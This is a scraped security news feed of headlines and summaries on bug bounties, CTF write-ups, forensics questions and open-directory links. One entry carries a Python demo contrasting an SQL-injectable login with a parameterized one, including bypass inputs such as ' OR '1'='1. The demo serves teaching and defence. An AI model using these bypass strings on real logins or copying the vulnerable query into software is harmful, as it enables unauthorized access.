So...while I know Windows 11 is out, and everyone's excited about the shiny new hotness, let's not forget that there's a lot that has worked since Windows XP (or even prior to that) and still continues to be an issue today.  ( 4 min )

    How to Choose a Security Plugin That’s Right for Your Website
    Finding the perfect security plugin for your website is important, but it’s also crucial you find the proper one that suits your needs. WordPress plugins are a dime a dozen, so we’ll be discussing how to narrow your options and what to look for in a reliable plugin so you can safely install it on your website. Some of the most frequent issues with poorly managed plugins include eating up memory in excess, 500 internal server errors, downtime, white pages, and slow response times. Continue reading How to Choose a Security Plugin That’s Right for Your Website at Sucuri Blog.

    Honeypot OSINT
    In this post I will be going through the open source intelligence process I went through following an attack performed against my honeypot. Continue reading on Medium »  ( 8 min )
    Building a public OSINT lab target
    The Utah Valley University Cyber Security Program needed a realistic target that students could use to learn OSINT and offensive tools… Continue reading on Medium »  ( 1 min )
    [EN] TryHackMe 25 Days of Cyber Security: Day 14 Walkthrough
    [Day 14] OSINT Where’s Rudolph? Continue reading on Medium »  ( 3 min )
    Tallin To Search More Churches — OSINT Challenge 14
    On Dec 27, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken. Please… Continue reading on Medium »  ( 1 min )

    Adding customers to victim’s store via Insecure Direct Object Reference
    Hello! I am back with my 2nd bug bounty write up. This time I’ll be showing you how I found an Insecure Direct Object Reference bug on an… Continue reading on Medium »  ( 1 min )
    QRCDR Path Traversal Vulnerability
    QRCDR is a popular PHP — JavaScript QR-Code Generator, which is widely used for creating customized QR-Code in easy steps. also, it’s used… Continue reading on Medium »  ( 2 min )
    Hacking ticketastic
    Hi guys! I’m back with another great blog, with this blog you can learn more about SQLi and Cross Site Request Forgery (CSRF). Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 7
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web technologies required for starting with the web Exploitation Part-2
    Hello, I, Manan Aggarwal, am here to present the blog about the Basic Web technologies required for starting with the web Exploitation… Continue reading on Medium »  ( 4 min )
    Introduction to Spring Boot Related Vulnerabilities
    Spring Boot related vulnerability learning materials, collection of utilization methods and skills, black box security assessment checklist Continue reading on Medium »  ( 12 min )
    iOS jailbreak dev wins $2M bounty for finding critical Optimism bug
    Continue reading on Medium »  ( 2 min )
    VulnLab SQL Injection— Dynamic Application Security Testing #3
    Assalamualaikum Wr.Wb Continue reading on Medium »  ( 6 min )

    Amcache SHA-1 mismatch
    Hoping someone has seen this or has an idea what may be happening. I am performing a review and identified an installer file as an item of interest. I see the file in the host’s Amcache hive with a SHA-1 (“A”) hash. However, the recovered file has a different SHA-1 hash on disk (“B”). When running the executable on my test system and comparing it to that test machine’s Amcache, I see the same behavior. Amcache has hash “A” and the executable has hash “B.” Every other program I’ve sampled has hash matches; it seems like just this one is off. What gives? For specifics, I am using RegistryExplorer and Amcache Parser (both Zimmerman tools) for Amcache analysis. I am hashing with both X-Ways and Hasher (also Zimmerman). When reviewing Amcache Parser, I am matching the hash to the executable …  ( 3 min )
    Does anyone have Magnet Acquire download link without filling the form?
    I can't afford the axiom (or whatever it is called) so can anyone provide me the link? Thank you so much! submitted by /u/Hopelessssssssss [link] [comments]  ( 1 min )
    Announcing Opensource X-Ways HashExporter Extension
    This opensource extension allows you to dump all the hashes from an image using X-Ways command-line. https://github.com/PolitoInc/X-Ways-HashExporter-Extension submitted by /u/Alarming_Arm_7724 [link] [comments]  ( 1 min )
    What program should I specialize in if I cannot choose digital forensics?
    Computer Science and Engineering with specialisation in Blockchain Technology; Computer Science and Engineering with specialisation in Information Technology; Computer Science and Engineering with specialisation in Data Science. Or does it not matter as long as it is Csc? submitted by /u/nodogsareevil [link] [comments]  ( 1 min )
    What transferable skills does forensics provide?
    I am currently a digital forensic analyst of both phones and computers for law enforcement. I want to transition into a new tech role, such as infosec or another form of cyber sec but looking at the job specs for 90% of these roles I do not meet the requirements. I’m considering self funding a cert such as CISSP or Security+ as this will most likely help. What sort of jobs can my current role land me in? submitted by /u/gofigured21 [link] [comments]  ( 3 min )
    CHFI Content Weightage
    Hello, Can we guess the content weightage of CHFI in the actual exam? I mean how can we know which modules will have more questions and other modules will have fewer questions in exam? I need to take the test and the book is very lengthy that can't be read as a whole so I want to get info about modules' weightage so I can learn them first (which will have more questions in the exam) and then the remaining modules (which have fewer questions). If not exactly any guess about it? submitted by /u/hardfire005 [link] [comments]  ( 1 min )
    Learning DFIR?
    Hi everyone. I am eJPT certified and been doing tryhackme for a year now. I want to move towards blue side, especially forensics and incident response. What i wanna ask is what is best resource/website to learn dfir/soc etc Is CHFI course content good? Are elearn security forensics and incident response courses and certs valuable? Or should i stick with tryhackme (it has less content regarding blue teaming) I have also heard of securityblueteam so is the investment there invaluable? Thanks submitted by /u/Nightkinnng [link] [comments]  ( 1 min )

    CALISHOT 2022-02: Find ebooks among 348 Calibre sites this month
    submitted by /u/krazybug [link] [comments]  ( 1 min )
    archaeological dig photos from Iraq
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    [q] Index template/website script
    Hi guys, I hope this is the correct place to ask; I want to make a website where I can index certain posts and urls. (like a blog but easier) could you please guide me? ​ tyvm submitted by /u/zuperfly [link] [comments]  ( 1 min )
    A way to clone an Open Directory?
    Is there a way to clone/upload all the files from an OD to my shared Google Drive? I know about rclone but since it's not easy to use, I don't want to waste time with it if it can't do the required task. + Is there a tool that can upload a shared Google Drive file to my shared drive? Again, I know about the "make a copy" option but that is not usable if the file is over the size of the free space your drive has. submitted by /u/CompetitiveMango12 [link] [comments]  ( 2 min )

    Discoverability by phone number/email restriction bypass
    Twitter disclosed a bug submitted by zhirinovskiy: https://hackerone.com/reports/1439026 - Bounty: $5040
    Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1423704 - Bounty: $100
    Information Exposure Through Directory Listing vulnerability
    Nextcloud disclosed a bug submitted by technorat: https://hackerone.com/reports/1476709

    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    🔥🔥 A new version 0.1.3 released for Kubesploit: a post-exploitation framework for Kubernetes🔥🔥
    submitted by /u/kubiscan [link] [comments]
    Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2
    submitted by /u/dmchell [link] [comments]

    SecWiki News 2022-02-11 Review
    [HTB] Love Writeup by 0x584a; PendingIntent redirection: a generic privilege escalation technique against the Android system and popular apps by ourren; Security risks of automated machine learning by ourren; Deconstructing open-source IAST to build a sharp gray-box security tool by ourren; For more recent articles, please visit SecWiki  ( 2 min )

    FreeBuf Morning Report | Shanghai programmer sentenced to 10 months for deleting a database and running; 500 e-commerce sites implanted with credit-card skimmers
    A 29-year-old programmer surnamed Lu, without the company's permission, deleted all of the system code for the soon-to-launch JD Daojia (京东到家) platform on the day he left the company.  ( 1 min )
    Fake dnSpy - this chicken soup is poisoned!
    dnSpy is a popular tool for debugging, modifying and decompiling .NET programs. Security researchers use it frequently when analyzing .NET programs or malware.  ( 1 min )
    Hackers attack European port oil facilities and send oil prices soaring; Shanghai issues its first Enterprise Data Compliance Guidelines; Microsoft plans to acquire a cybersecurity company | Cybersecurity Weekly
    From February 7 to February 11, 2022, eight global cybersecurity hot topics were collected, involving Microsoft, Mandiant, Puma, Swissport and others.  ( 1 min )
    French regulator says Google Analytics poses a data privacy risk
    The French regulator found that the service does not take sufficient measures to protect data privacy during data transfers and could be exploited by US intelligence agencies.
    Kimsuky is using xRAT for data theft
    Recently, ASEC analysts found the Kimsuky group using xRAT (an open-source RAT customized from Quasar RAT) malware.  ( 1 min )
    Arid Viper APT group launches attacks against Palestine
    The Arid Viper group used content originally published by Turkey's state news agency Anadolu and the Palestinian MAAN Development Center as lures to attack Palestinian institutions.  ( 1 min )
    FreeBuf Weekly | Over 500,000 people affected by the Morley ransomware attack; hackers attack European port oil facilities
    Business services company Morley Companies disclosed a user data breach in which large amounts of user data were stolen.  ( 1 min )
    SPD Bank Credit Card Center is hiring information security engineers
    Shanghai Pudong Development Bank Credit Card Center is hiring information security engineers.
    MIIT solicits comments again on the Measures for Data Security Management in the Industry and Information Technology Sector (Trial)
    The Measures comprise eight chapters and forty-one articles and stress that important data and core data must be stored domestically in accordance with the relevant laws and regulations, or undergo a data export security assessment in accordance with law.  ( 1 min )
    A brief discussion of musl heap exploitation techniques (DEBUG edition)
    More and more competitions are setting musl-type challenges lately, so I had to study musl heap exploitation to prepare for future contests.  ( 1 min )

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation.  ( 6 min )


    How to crack RSA-512 on off-the-shelf hardware in 4 days
    submitted by /u/ScottContini [link] [comments]
    Five Vulnerabilities Explained in Moxa MXview for OT Networks
    submitted by /u/h4ck3dit [link] [comments]
    Safer entropy accumulation in Linux 5.18's RNG
    submitted by /u/zx2c4 [link] [comments]  ( 1 min )
    what is Walkme Extension used for? I have it installed and enforced by default without ability to disable it - in all Chrome browsers on the work laptop...
    submitted by /u/One-World-One-Love [link] [comments]  ( 1 min )
    🇬🇧 Gaining the upper hand(le) - Hunting for privilege escalations and UAC bypasses by looking for leaked handles in unprivileged processes by @APTortellini and @last0x00
    submitted by /u/last0x00 [link] [comments]  ( 1 min )
    Firejail oopsie
    submitted by /u/MonkeeSage [link] [comments]

    Fuzzing for XSS via nested parsers condition
    Article URL: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ Comments URL: https://news.ycombinator.com/item?id=30292426 Points: 1 # Comments: 0  ( 5 min )

    CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module Since 4.8
    Article URL: https://www.openwall.com/lists/oss-security/2022/02/10/1 Comments URL: https://news.ycombinator.com/item?id=30291958 Points: 2 # Comments: 0  ( 6 min )

    MakerDAO Launches $10m Bug Bounty On Immunefi
    Immunefi has grown by leaps & bounds since we first launched in December 2020 and now protects over $100 billion (that’s Billion with a B)… Continue reading on Immunefi »  ( 2 min )
    Programming languages and Cybersecurity
    Codes are fundamental blocks of logic which drives businesses all around the world today. Continue reading on Medium »  ( 6 min )
    100 Days of Hacking - Day 6
    Objectives of day 6 : Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — Day 5
    Objectives of day 5 : Continue reading on Medium »  ( 1 min )
    Launching Superfluid Bug Bounty Program with Immunefi
    Our mission to establish the Superfluid Protocol as a key component of the financial rails of the future requires more than technological… Continue reading on Superfluid Blog »  ( 3 min )
    Buy any Products For Free From Bewakoof.com || Bug-Bounty $$
    Hi, Here we will see how you can buy any product for free from Bewakoof.com Continue reading on Medium »  ( 2 min )
    Internet-Wide Study: State Of SPF, DKIM, And DMARC — RedHunt Labs
    At RedHunt Labs, (under Project Resonance), we frequently conduct internet-wide research in different shapes and formats to understand the… Continue reading on Medium »  ( 7 min )
    How I earned $2,500 from finding vulnerabilities
    Peace be upon you and God's mercy and blessings. Continue reading on Medium »  ( 1 min )
  • Open

    Are there only 2 types of people in this world? — An OSINT analysis
    Today as I was scrolling through my LinkedIn’s home feed I came across this image that had been liked by someone from my network. Continue reading on Medium »  ( 3 min )
    Cyberspace Vault Osint
    Task Continue reading on Medium »
  • Open

    [h1-2102] Information disclosure - ShopifyPlus add user displays existing Shopify ID fullname
    Shopify disclosed a bug submitted by francisbeaudoin: https://hackerone.com/reports/1083922 - Bounty: $1900
    Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1015283 - Bounty: $500
    Password reset token leak via "Host header" on third party website
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1092831
    Orders full read for a staff with only `Customers` permissions.
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1392032 - Bounty: $800
    Critically Sensitive Spring Boot Endpoints Exposed
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1022048 - Bounty: $5000
    Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances
    GitLab disclosed a bug submitted by iwis: https://hackerone.com/reports/970869 - Bounty: $1500
    Installing Gitlab runner with Docker-In-Docker allows root access
    GitLab disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1417211 - Bounty: $100
    Node.js Certificate Verification Bypass via String Injection
    Node.js disclosed a bug submitted by bengl: https://hackerone.com/reports/1429694
  • Open

    RCE vs Code Injection
    Hi, what's the difference between RCE and Code Injection? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    What is the type of vulnerability called where you put the wrong file extension in the URL on a file that you shouldnt have access to?
    I accidentally discovered something like that during a very beginner CTF challenge. We were supposed to do an SQL injection to get a config file, but for some reason I put config.php in the URL and got the file in the browser. I reported it to the people holding the CTF and they said they reported it to the maker of the server software. I believe the software was open source, so it would be fun to find a note somewhere that they fixed it. That is why I wonder what this type of vulnerability is called. submitted by /u/HugoTRB [link] [comments]  ( 2 min )
    What’s your pentesting workbench?
    I am going to create a set of servers for pentesting and I would like your suggestions/advice/comments. I would buy three servers, one for exploit dev/malware analysis, preferably Debian (Kali or Ubuntu), and the other two for pentesting. submitted by /u/Sea_Finish6689 [link] [comments]  ( 3 min )
  • Open

    Email Forensics CTF Now Live
    Hello, folks! Our Email Forensics Capture The Flag Competition is now live! The event comprises weekly challenges for ten weeks. https://m.klr.co/kMhMA Good luck, and have fun! submitted by /u/MetaspikeHQ [link] [comments]  ( 1 min )
    Black screen and flashing cursor on boot when running SIFT Workstation in VirtualBox
    I'm not sure if this is the correct place to post, apologies if it isn't. I have downloaded the SIFT Workstation OVA file from the SANS website and opened it in VirtualBox. I get a boot menu where I can either just start Ubuntu or run the memory test application. Choosing Ubuntu, I just get a black screen with a flashing underscore cursor in the top left corner. It has been standing there for 10 minutes now and nothing happens. It never gets to the logon screen. I have seen others mention the issue when searching for it, but I haven't found any mentioned solutions. Any ideas? submitted by /u/kennethfinnerup [link] [comments]  ( 1 min )
    Question about $Ntuninstall files..
    So I was nosing around an old HDD that had XP installed, and I came across these folders in the WINDOWS directory. Inside them, there are files called “spuninst”. So I opened them in Notepad and there is a system.snapshot heading with a bunch of programs and such listed. My first question is: Is this every program that was installed at this particular moment in time on the computer? Is there a way to see when past programs were installed and subsequently deleted if there are no files to look at creation dates? Thanks for any help submitted by /u/Pubh12 [link] [comments]  ( 1 min )
  • Open

    Social Engineering Basics: How to Win Friends and Infiltrate Businesses
    Technology changes and defenses get better, but some things stay the same—like human gullibility, which can be easily exploited through social engineering. What is social engineering? Social engineering, at its core, is taking advantage of human nature. Humans are innately trusting, often try to help, and want to avoid confrontation. A big facet of social... The post Social Engineering Basics: How to Win Friends and Infiltrate Businesses appeared first on TrustedSec.  ( 5 min )
  • Open

    Vulnerability Reward Program: 2021 Year in Review
    Article URL: https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html Comments URL: https://news.ycombinator.com/item?id=30289291 Points: 1 # Comments: 0  ( 12 min )
    Responding to and Learning from the Log4Shell Vulnerability
    Article URL: https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability Comments URL: https://news.ycombinator.com/item?id=30284252 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SecWiki News 2022-02-10 Review
    Top 10 web hacking techniques of 2021 by ourren; A Tale of DOM-based XSS! by ourren; Detecting beacon traffic with RITA by ourren; CVE-2021-33742: analysis of the Internet Explorer MSHTML heap out-of-bounds write vulnerability by ourren; The defensive dilemma enterprises face against APT-style attacks by ourren; CobaltStrike check-in over blockchain networks and its detection by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Lots of porn photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
    [NSFW] nastyflixxx.net
    http://www.nastyflixxx.net/clips/?C=S;O=A submitted by /u/mrcave81 [link] [comments]
    Some NOAA Hurricane Files
    https://www.nhc.noaa.gov/video/ Nothing really that interesting submitted by /u/420danger_noodle420 [link] [comments]
    FTP of a Russian ISP (Ufanet)
    You can find some good stuff in it I think? http://ftp.ufanet.ru/
    Url: http://ftp.ufanet.ru/
    Top 5 extensions (files, size): .iso 363, 384.42 GiB; .xz 283, 105.96 GiB; .img 136, 52.78 GiB; .tar 16,647, 29.78 GiB; .bz2 112, 29.21 GiB
    Dirs: 10,532; Ext: 188; Total: 24,123 files, 664.74 GiB; Date (UTC): 2022-02-10 01:01:31; Time: 00:03:28; Speed: 2.01 MB/s (16.1 mbit)
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Some site's wp-content/uploads pages
    https://www.the8bitguy.com/wp-content/uploads/ ​ https://tomorrowcorporation.com/blog/wp-content/uploads/ submitted by /u/ilikemacsalot [link] [comments]
    Informatic related Stuff (In French)
    https://download.d-l.fr/apache_listing/ or https://download.d-l.fr (it's the same content but a different UI) http://s472165864.onlinehome.fr/anywarare/index.php?dir=|
    Url: https://download.d-l.fr/apache_listing/
    Top 5 extensions (files, size): .iso 112, 233.52 GiB; .zip 101, 24.71 GiB; .exe 169, 17.93 GiB; .xz 7, 4.65 GiB; .1 1, 4.4 GiB
    Dirs: 150; Ext: 46; Total: 572 files, 296.05 GiB; Date (UTC): 2022-02-10 00:55:22; Time: 00:00:35; Speed: 23.48 MB/s (187.8 mbit)
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    Url: http://s472165864.onlinehome.fr/anywar...
    Top 5 extensions (files, size): .zip 808, 69.32 GiB; .iso 26, 63.33 GiB; .exe 604, 60.11 GiB; .001 2, 6.6 GiB; .002 2, 6.4 GiB
    Dirs: 285; Ext: 23; Total: 1,868 files, 212.62 GiB; Date (UTC): 2022-02-10 00:59:03; Time: 00:00:09; Speed: Failed
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    Watch "Welcome to C0V3RT - Exploration of ALL THINGS "Covert Entry"" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
    Dump Information for Process using GetTokenInformation
    In this post, you will get a very thorough step-by-step walkthrough on building your own process token dumper in C++, which will help you know your target better before launching another post-exploitation attack. https://tbhaxor.com/dumping-token-information-in-windows/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Perks | Colorful picks, enjoy the Lantern Festival: come celebrate at the FB store!
    Feb 14-17, celebrate the Lantern Festival at the FB store
    Cloned Pirate Bay sites are serving malicious ads to millions of users
    Security researchers at CyberNews found five malicious sites posing as the well-known torrent piracy site The Pirate Bay that serve malicious ads to more than 7 million users a month.  ( 1 min )
    Guangdong Province Public Data Security Management Measures (draft for comment) released, emphasizing the security of public data
    The draft comprises six chapters and 32 articles; it strengthens security management of digital-government public data, regulates public data processing activities, promotes orderly development and use of data resources, and protects the lawful rights and interests of individuals and organizations.
    Notes from an incident response to a cryptomining malware infection
    Notes from an incident response to a cryptomining malware infection  ( 1 min )
    Mini-program testing workflow
    The workflow has two sides: unpacking the mini-program surfaces information leaks and hidden endpoints, while capturing its traffic lets you test logic flaws and API security issues.  ( 1 min )
    Be careful with Windows 11 updates: malware has already set its sights on them
    Just as Windows 11 enters wide deployment, the RedLine malware gang has quietly targeted this wave of updates and is well prepared to attack.  ( 1 min )
    FreeBuf Morning Report | Intel discloses 16 new BIOS-related vulnerabilities; Pirate Bay clones target millions of users with malware
    CyberNews researchers found five clones of The Pirate Bay that serve malicious ads to more than 7 million users each month.  ( 1 min )
  • Open

    Strengthening ZAP scanning with Custom Payloads 🚀
    Today I'd like to introduce a ZAP feature I've been looking at with some interest recently: Custom Payloads. It lets you test against a specified set of payloads more easily, without using the Fuzzer or ZAP's scripting engine, so I think it will serve you well in security testing and automation. Let's get started :D Custom Payloads Custom Payloads is a feature and add-on that lets ZAP's Active Scan and Passive Scan run with payloads the user specifies. Two categories are available so far, and because it runs as part of the scan, I expect the feature's benefit to grow as more categories are added.

  • Open

    Is there a way to find out what server/IP address a program accesses?
    I'm trying to find the server so I can ping it manually, but I don't know if that's possible. I'm almost a beginner in this; I want to know the ping time. submitted by /u/Mayhem_8116 [link] [comments]  ( 1 min )
    Why is it common practice to reset a password after a few failed attempts?
    Hi Netsec people! Every once in a while I will get emails saying that some website/service I’m registered on has reset my password because of too many failed log in attempts. Now I’m not too surprised by the attempts, since according to HaveIBeenPwned, my credentials have been ‘exposed’ over 30 times in breaches dating back to the early 2010s. However, a while back I gave up my terrible practice of using 1 password across multiple services and migrated to using a password manager, and now all of my passwords to every service I’m on are randomly generated, so I’m not too worried by these attempts. My question is this: Why does the most common practice seem to be for services to reset your password after a few failed attempts? To me that seems like if x log in attempts failed, the password was robust/held up—why force the user to change it? If the user used a random generator, repeated tries that are time separated (I.e. wait 10min before trying again) probably won’t get an attacker anywhere. If a person isn’t using a password manager/generator then forcing the user to reset might actually lead them to use a weaker password since they will have to come up with something familiar, and there are only so many familiar items a person can keep track of at a time… I’d love to hear some insights on to why this reset after x tries approach appears to be such a pervasive (and counterintuitive) practice! Sorry if this isn’t the right place for a question like this! submitted by /u/KrishanuAR [link] [comments]  ( 2 min )
    Hosts making DNS queries to malicious site. How to dig deeper and find source?
    I have some infected hosts in the LAN communicating with a C&C server and bots, but that URL seems to be hidden behind the Cloudflare CDN as per Wireshark sniffing on an infected host. In other words, I must say the hosts are making DNS queries to a malicious site. Our PAs with DNS filtering have blocked the domain since it was flagged as malicious. How can I find the source of the infection on the host? Any tools I can use to see which process or application is making the DNS queries? Any advice on how to dig deeper and find what process is making these queries so we can get rid of these logs? submitted by /u/techno_it [link] [comments]  ( 3 min )
    Does this report that Palestinian threat actor is behind new Mid East phishing attacks sound right?
    Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said via Threatpost. https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/ submitted by /u/Technical-Tea-4902 [link] [comments]  ( 1 min )
    RCE vs Command Injection
    Hi, what's the difference between RCE and Command Injection? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Setting up a security program
    So a long time ago some of the higher ups decided we should have a security program within our product development, the idea was that there would be one person in each scrum team responsible for promoting security and they would get some additional training to help with that. Like a lot of these central programs it continued for a few months and then was quickly forgotten about. Now I've been tasked with setting up our own version in the division as the central version is pretty much dead but they're still pushing the general idea. This is what is currently on my list - Security champions to be Security+ certified (I know it's a broad basic cert but I figure we can get funding for this and then progress to more advanced targeted training) - Add a method into Jira for tracking security related issues separately - Create discrete security projects as epics so we can fix some of the legacy issues completely and not worry about them anymore (current ideas for these include: removing third party services to reduce exposure, updating some very old libraries, updating SQL user security etc) Any other ideas of things I could introduce? submitted by /u/dbxp [link] [comments]  ( 3 min )
    CVSS calculation weight reasoning
    Hello AskNetsec. I was wondering if there is a resource describing the CVSS calculation reasoning. Not just how the CVSS is calculated but also the reasoning behind the weight of the different variables. For example in the specification (https://www.first.org/cvss/specification-document) under "CVSS v3.1 Equations", WHY is ISS = 6.42 * ISS? Where does 6.42 come from? Is there any research paper or whitepaper for this? submitted by /u/someuserman [link] [comments]  ( 1 min )
    Question about patching the built-in Python on macOS
    Do I need to patch / install a new version of Python manually in order to fix the Python vulnerability on my macOS? For example, my macOS is upgraded to Monterey 12.1, but my Python version is still 3.7.9, which is vulnerable to CVE-2021-3177. I tried to search whether the vulnerability, say CVE-2021-3177, affects my version of macOS. However, Apple doesn't seem to have put that information into their security update documentation. submitted by /u/20151124 [link] [comments]  ( 1 min )
  • Open

    npm weak links
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]
    New release of 🔥Kubesploit v0.1.3🔥
    submitted by /u/jat0369 [link] [comments]
    Top 10 web hacking techniques of 2021
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    My SQLi adventure or: why you should make sure your WAF is configured properly
    submitted by /u/gsk-upxyz [link] [comments]
  • Open

    Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102546 - Bounty: $500
    staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102660 - Bounty: $500
    staffOrderNotificationSubscriptionCreate Is Not Blocked Entirely From Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102652 - Bounty: $900
    Race condition in User comments Likes
    Zomato disclosed a bug submitted by 0xdexter: https://hackerone.com/reports/1409913 - Bounty: $150
    Reflected xss on ads.tiktok.com using `from` parameter.
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1452375 - Bounty: $6000
  • Open

    Coordinated vulnerability disclosure (CVD) for open source projects
    Article URL: https://github.blog/2022-02-09-coordinated-vulnerability-disclosure-cvd-open-source-projects/ Comments URL: https://news.ycombinator.com/item?id=30278015 Points: 1 # Comments: 0  ( 8 min )
  • Open

    Basic Web Technologies Knowledge required for starting with the web Exploitation Part 1
    Hello guys, I'm Manan Aggarwal, a BTech student, here to present the information about the basic technologies which you need… Continue reading on Medium »  ( 4 min )
    Hacking with Rake
    Rake is a utility that can be used to automate tasks. For example, if a program needs to be set up in a certain way, Rake could be used to… Continue reading on Medium »
    How I made $15k from a Remote Code Execution Vulnerability
    Hello Everyone 👋 Continue reading on Medium »  ( 1 min )
    How I hacked Google to read files from their servers for free!
    Hey guys, this is Harish! I used to hunt on the Microsoft and Google VRPs. This is my first write-up! Continue reading on Medium »  ( 1 min )
    Everything you need to know about clickjacking
    A complete guide to how to exploit clickjacking and how to prevent it. Continue reading on InfoSec Write-ups »  ( 3 min )
    QuickSwap’s New UI Alpha $50,000 Bug Bounty
    TL; DR: Continue reading on Medium »  ( 1 min )
    XDAG new version of wallet (0.4.0) officially released
    Repost of the 2011–11–05 news on xdag.io Continue reading on Medium »  ( 1 min )
    XDAG Mars Project
    repost of 2021–05–09 news on xdag.io Continue reading on Medium »  ( 4 min )
    XDAG Java Edition Testing Tutorial
    Hello to all, As some of you know, we are currently working on making the project more attractive to developers. Continue reading on Medium »  ( 2 min )
    Login function module: User Authentication .
    Input: User id and Password SQL: select * from admin where user_id = 'admin' and password=’****' Continue reading on Medium »
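The login snippet above builds its WHERE clause from the submitted user id and password. The following is an added example (not code from the Medium post) that shows, against a constructed in-memory SQLite table standing in for the page's `admin` table, why that query must be parameterized: the concatenated form accepts `' OR '1'='1` as the password (or `admin'--` as the user id) and logs the attacker in, while the bound-parameter form treats the same strings as data and rejects them. The table contents and the correct password are invented for the example.

```python
import sqlite3

# Constructed in-memory table standing in for the page's `admin` table (example data, not the post's).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE admin (user_id TEXT PRIMARY KEY, password TEXT)")
_conn.execute("INSERT INTO admin VALUES ('admin', 'correct horse battery staple')")
_conn.commit()


def login_vulnerable(user_id: str, password: str) -> bool:
    """The page's query, built by string interpolation.

    Attacker-controlled input becomes part of the SQL text, so a quote in the
    input closes the literal and the rest is parsed as SQL:
      password = ' OR '1'='1   ->  ... and password='' OR '1'='1'   (always true)
      user_id  = admin'--      ->  ... user_id = 'admin'--' and ...  (rest is a comment)
    """
    sql = f"select * from admin where user_id = '{user_id}' and password='{password}'"
    return _conn.execute(sql).fetchone() is not None


def login_safe(user_id: str, password: str) -> bool:
    """Same query with bound parameters.

    The driver sends the SQL text and the values separately; quotes, `--` and
    `OR` inside a value can never change the statement's structure.
    """
    sql = "select * from admin where user_id = ? and password = ?"
    return _conn.execute(sql, (user_id, password)).fetchone() is not None


if __name__ == "__main__":
    bypass_password = "' OR '1'='1"
    bypass_user = "admin'--"
    print("vulnerable, real password :", login_vulnerable("admin", "correct horse battery staple"))  # True
    print("vulnerable, bypass password:", login_vulnerable("admin", bypass_password))               # True
    print("vulnerable, bypass user    :", login_vulnerable(bypass_user, "anything"))                # True
    print("safe, real password        :", login_safe("admin", "correct horse battery staple"))      # True
    print("safe, bypass password      :", login_safe("admin", bypass_password))                     # False
    print("safe, bypass user          :", login_safe(bypass_user, "anything"))                      # False
```

Comparing the password column directly is kept only to mirror the page's query; a real login stores a salted hash and compares the hash of the submitted password, which also removes the second problem with the original statement (plaintext passwords in the table).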
  • Open

    Introducing BloodHound 4.1 — The Three Headed Hound
    Prior Work Continue reading on Posts By SpecterOps Team Members »  ( 3 min )
    CRTO Review (Certified Red Team Operator)
    I had a certificate by successfully completing the CRTO exam in the past days, and while my knowledge was still fresh, I decided to write… Continue reading on Medium »  ( 4 min )
    Raspberry Pi Pico as a Rubber Ducky
    Installation Continue reading on Medium »  ( 1 min )
  • Open

    Top 10 Security Tips to Keep Your WordPress Site Healthy
    As we go through the winter months and the weather changes, many of us go to our local pharmacy and take advantage of a flu shot. We do this because maybe we have had the flu before, and the second of pain from the jab is nothing in comparison to the hours and days of sickness from catching the flu bug.  As everyone’s grandparents tell them, “An ounce of prevention is worth a pound of cure.” Continue reading Top 10 Security Tips to Keep Your WordPress Site Healthy at Sucuri Blog.
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challenge  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
